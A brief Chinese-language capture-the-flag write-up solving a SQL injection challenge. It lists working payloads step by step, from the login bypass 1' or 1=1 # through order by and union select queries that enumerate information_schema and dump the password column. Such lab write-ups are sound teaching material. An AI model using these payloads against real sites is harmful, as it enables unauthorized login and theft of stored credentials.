打开题目
几次尝试,发现输1 1",页面都会回显NO,Wrong username password!!!
只有输入1',页面报错,说明是单引号的字符型注入

那我们万能密码试试能不能登录
1' or 1=1 #
成功登录

得到账号和密码
我们登录一下发现什么也没有
爆破列名字段数
1' order by 4 # 页面报错

但是1' order by 3 #时
页面没有报错,说明列名字段数为3
爆破数据显示位
1' union select 1,2,3 #

可以得到数据显示位为2和3
接着我们爆破数据库名
1' union select 1,2,database() #

得到数据库名为geek
爆破表名
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #
当前数据库下的所有表名有

爆破列名
在这里我们先试试l0ve1ysq1表
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
得到其表下有三个字段

我们直接爆破password字段试试下面有没有flag
1' union select 1,2,group_concat(password) from l0ve1ysq1 #
得到数据
直接查看源代码得到flag

